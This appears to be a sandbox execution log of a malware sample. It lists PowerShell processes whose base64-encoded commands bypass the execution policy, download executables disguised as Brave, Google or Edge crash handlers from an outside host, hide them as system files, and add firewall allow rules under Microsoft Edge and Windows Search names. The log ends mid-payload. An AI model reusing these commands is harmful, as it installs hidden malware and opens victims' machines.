  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApAHsAfQAKAGUAbABzAGUAIAB7AAoACQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBmAGkAbABlAHMALgBmAHIAZQBlAHMAbwBmAHQAcABsAGEAYwBlAC4AYwBvAG0ALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAA==
      4⤵
      PID:1496
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2588
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6EA5.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6EA2.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6EA3.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6EA4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:2692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApAHsAfQAKAGUAbABzAGUAIAB7AAoACQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBmAGkAbABlAHMALgBmAHIAZQBlAHMAbwBmAHQAcABsAGEAYwBlAC4AYwBvAG0ALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAAoAJABmAGkAbABlAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAnAEgAaQBkAGQAZQBuACcALAAnAFMAeQBzAHQAZQBtACcACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgAkAGYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
      4⤵
      PID:3812
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2368
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7F83.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7F80.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7F81.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7F82.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:5568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBzAC4AZgByAGUAZQBzAG8AZgB0AHAAbABhAGMAZQAuAGMAbwBtAC8ARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgAkAGYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiAAoAJABmAGkAbABlAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAnAEgAaQBkAGQAZQBuACcALAAnAFMAeQBzAHQAZQBtACcA
      4⤵
      PID:5736
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:6008
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssA07D.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiA06B.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrA06C.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrA06D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:5344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAewB9AAoAZQBsAHMAZQAgAHsACgAJAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACIAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAcwAuAGYAcgBlAGUAcwBvAGYAdABwAGwAYQBjAGUALgBjAG8AbQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
      4⤵
      PID:4092
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:4860
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss11CA.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi11C7.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr11C8.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr11C9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:1508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAbQBhAGsAZQAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBzAC4AZgByAGUAZQBzAG8AZgB0AHAAbABhAGMAZQAuAGMAbwBtAC8ARQBtAGIAbQBhAGsAZQAuAGUAeABlACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBtAGEAawBlAC4AZQB4AGUAIgAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAbQBhAGsAZQAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
      4⤵
      PID:5288
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:5616
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3833.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi3830.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr3831.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr3832.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:5564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBzAC4AZgByAGUAZQBzAG8AZgB0AHAAbABhAGMAZQAuAGMAbwBtAC8ARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
      4⤵
      PID:2992
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:3372
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss57F5.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi57F2.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr57F3.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr57F4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:4956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIgAgAC0ARwByAG8AdQBwACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIABFAFUATABBACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACAARQBVAEwAQQAiACAALQBHAHIAbwB1AHAAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAgAEUAVQBMAEEAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
      4⤵
      PID:5216
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:1512
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss5D88.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi5D85.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr5D86.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr5D87.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoA